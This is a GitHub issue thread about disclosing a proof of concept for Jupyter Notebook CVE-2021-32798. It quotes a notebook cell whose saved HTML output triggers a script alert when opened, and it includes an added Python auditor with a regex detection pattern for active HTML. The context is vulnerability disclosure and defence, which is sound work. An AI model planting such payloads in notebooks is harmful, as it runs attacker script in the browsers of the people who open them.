jupyter / security


Is it ok to share a PoC of CVE-2021-32798? #25

Closed jasiam closed 2 years ago

jasiam commented 2 years ago

Hi,

I didn't know where or how to contact the Jupyter Security team to ask this, so excuse me if this is not the right place to do it.

I'd like to publish a PoC to show how to get RCE from that CVE. What is your security advisory policy regarding this?

Regards.

Carreau commented 2 years ago

Hi,

Yes, sorry, we should have published a PoC. The advisory is here; I'll try to update it with a PoC.

https://github.com/jupyter/notebook/security/advisories/GHSA-hwvq-6gjx-j797

And you can always contact security@ipython.org if you want a private discussion.

I believe this is one example given in the original (private) thread:

For CVE-2021-32798, create a notebook with the following content in a cell and it would display an alert when opened for the first time in Notebook (in an untrusted state):

```json
{
  "cell_type": "code",
  "execution_count": 0,
  "metadata": {},
  "outputs": [
    {
      "data": {
        "text/html": [
          "<select><iframe></select><img src=x: onerror=alert('xss')>\n"
        ],
        "text/plain": []
      },
      "metadata": {},
      "output_type": "display_data"
    }
  ],
  "source": [
    ""
  ]
}
```

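An added example, not part of the thread or of the Jupyter project's code: a pre-open triage for notebooks from untrusted sources that flags saved rich outputs like the one quoted above and produces a copy keeping only `text/plain` outputs. The marker regex, the `SAFE_MIME` allow-list and the function names are assumptions of this example; it inspects cell outputs only and is not a complete HTML sanitizer.

```python
import copy
import json
import re

# Heuristic markers of active content (an assumption of this example, not an
# exhaustive list): inline event handlers, script/iframe tags, javascript: URLs.
ACTIVE_HTML = re.compile(r"\bon[a-z]+\s*=|<\s*(script|iframe)\b|javascript:", re.I)
# MIME types kept when stripping; every other entry in an output's "data" is dropped.
SAFE_MIME = {"text/plain"}


def _text(value):
    """nbformat stores MIME payloads as a string or a list of lines."""
    return "".join(value) if isinstance(value, list) else str(value)


def audit_notebook(nb):
    """Return (cell_index, output_index, mime) for each suspicious rich output."""
    findings = []
    for ci, cell in enumerate(nb.get("cells", [])):
        for oi, out in enumerate(cell.get("outputs", [])):
            for mime, payload in out.get("data", {}).items():
                if mime == "application/javascript" or (
                    mime in ("text/html", "image/svg+xml", "text/markdown")
                    and ACTIVE_HTML.search(_text(payload))
                ):
                    findings.append((ci, oi, mime))
    return findings


def strip_rich_outputs(nb):
    """Return a deep copy whose outputs keep only SAFE_MIME entries."""
    clean = copy.deepcopy(nb)
    for cell in clean.get("cells", []):
        for out in cell.get("outputs", []):
            if "data" in out:
                out["data"] = {m: v for m, v in out["data"].items() if m in SAFE_MIME}
    return clean


# Constructed sample: the cell quoted in the thread, wrapped in a minimal notebook.
SAMPLE = json.loads(r'''{"nbformat": 4, "nbformat_minor": 5, "metadata": {}, "cells": [
 {"cell_type": "code", "execution_count": 0, "metadata": {}, "outputs": [
  {"data": {"text/html": ["<select><iframe></select><img src=x: onerror=alert('xss')>\n"],
            "text/plain": []}, "metadata": {}, "output_type": "display_data"}],
  "source": [""]}]}''')

if __name__ == "__main__":
    print(audit_notebook(SAMPLE))
    print(json.dumps(strip_rich_outputs(SAMPLE)["cells"][0]["outputs"]))
```

Stripping by MIME allow-list does not depend on how any HTML parser nests `<select>` and `<iframe>`, which is why it is used here for the cleanup step and the regex only for reporting.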
jasiam commented 2 years ago

Ok, then I'll commit my PoC to my github profile and I'll notify security@ipython.org in case anyone is interested.

Thanks!

Carreau commented 2 years ago

Thanks, or here is fine, security@ipython.org is mostly if you want to have something not public.

Carreau commented 2 years ago

Closing here if that's ok. We can still reopen.